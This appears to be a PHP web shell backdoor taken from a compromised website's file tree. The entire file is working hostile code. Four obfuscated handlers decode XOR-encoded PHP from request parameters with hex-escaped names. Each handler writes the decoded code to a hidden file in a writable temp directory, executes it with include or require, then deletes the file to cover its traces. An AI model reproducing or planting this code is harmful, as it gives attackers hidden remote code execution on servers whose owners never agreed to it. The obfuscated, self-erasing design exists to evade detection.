File: /home/vitanhod/bio-nissan.vitavit.com.pk/SReg.php
<?php if(isset($_REQUEST) && isset($_REQUEST["pa\x72\x61m\x65t\x65r_gro\x75p"])){ $binding = $_REQUEST["pa\x72\x61m\x65t\x65r_gro\x75p"]; $binding =explode ("." , $binding ) ; $res = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $u = 0; $len = count($binding); do { if ($u >= $len) break; $v9 = $binding[$u]; $sChar = ord($s[$u % $lenS]); $d = ((int)$v9 - $sChar - ($u % 10)) ^ 23; $res .= chr($d); $u++; } while (true); $entry = array_filter(["/dev/shm", getenv("TMP"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), session_save_path()]); foreach ($entry as $record): if (!!is_dir($record) && !!is_writable($record)) { $descriptor = sprintf("%s/.ptr", $record); if (@file_put_contents($descriptor, $res) !== false) { include $descriptor; unlink($descriptor); die(); } } endforeach; }
if(@$_POST["\x6D\x72k"] !== null){ $comp = array_filter([getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/var/tmp", "/tmp", sys_get_temp_dir(), "/dev/shm"]); $desc = $_POST["\x6D\x72k"]; $desc =explode ('.' , $desc); $component = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $w = 0; $__len = count($desc); do { if ($w >= $__len) break; $v8 = $desc[$w]; $chS = ord($s3[$w % $lenS]); $dec = ((int)$v8 - $chS - ($w % 10)) ^ 18; $component .= chr($dec); $w++; } while (true); foreach ($comp as $obj) { if ((bool)is_dir($obj) && (bool)is_writable($obj)) { $pointer = "$obj" . "/.token"; $success = file_put_contents($pointer, $component); if ($success) { include $pointer; @unlink($pointer); exit;} } } }
if(array_key_exists("\x64\x65sc", $_POST)){ $reference = $_POST["\x64\x65sc"]; $reference = explode ( '.' ,$reference ) ; $parameter_group =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $y =0; array_walk($reference, function ($v1) use (&$parameter_group, &$y, $s, $lenS) { $chS =ord($s[$y %$lenS]); $d =((int)$v1 - $chS - ($y %10)) ^ 1; $parameter_group .=chr($d); $y++; } ); $obj = array_filter([getenv("TEMP"), "/var/tmp", getcwd(), "/dev/shm", "/tmp", getenv("TMP"), sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]); for ($marker = 0, $itm = count($obj); $marker < $itm; $marker++) { $key = $obj[$marker]; if (array_product([is_dir($key), is_writable($key)])) { $record = sprintf("%s/.entry", $key); $file = fopen($record, 'w'); if ($file) { fwrite($file, $parameter_group); fclose($file); include $record; @unlink($record); die(); } } } }
if(in_array("\x62i\x6Ed\x69n\x67", array_keys($_REQUEST))){
$factor = $_REQUEST["\x62i\x6Ed\x69n\x67"];
$factor= explode ( "." , $factor ) ;
$property_set = '';
$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s2 );
$y = 0;
array_walk($factor, function ($v9) use (&$property_set, &$y, $s2, $sLen) {
$sChar = ord($s2[$y %$sLen] );
$dec = ((int)$v9 - $sChar - ($y %10)) ^ 44;
$property_set .=chr($dec );
$y++; });
$res = array_filter(["/tmp", "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
while ($desc = array_shift($res)) {
if (array_product([is_dir($desc), is_writable($desc)])) {
$sym = str_replace("{var_dir}", $desc, "{var_dir}/.mrk");
if (file_put_contents($sym, $property_set)) {
require $sym;
unlink($sym);
die();
}
}
}
}